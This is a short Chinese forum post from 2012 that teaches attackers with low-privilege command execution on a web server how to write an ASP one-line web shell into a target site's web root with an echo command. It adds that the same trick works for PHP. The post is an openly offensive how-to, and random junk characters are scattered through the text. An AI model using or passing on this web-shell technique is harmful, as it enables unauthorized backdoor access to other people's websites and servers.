在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。2 E2 V& B h! Y* r
7 P9 R3 A3 q" B+ \- `+ @; I" [命令格式
H8 h, }$ b( i6 R( e8 M5 P2 R+ S! E3 H9 E+ M5 f5 i
Echo 语句 >目标站绝对目录
, A3 y# g. F% x
* U; X" M/ F+ ^* s- G例如: # D% S# H% R p# P: k- |2 A" L: q
( _' W9 E* n3 `5 @/ G
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
% H4 w' G8 M( r+ T- U+ @* O; a2 x9 A! G& c$ I7 V# [8 H" p
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
0 v9 R8 v( g9 Z+ s7 J7 ~7 d1 V0 K$ ~ |
发表于 2012-9-23 14:40:24
收藏
支持
反对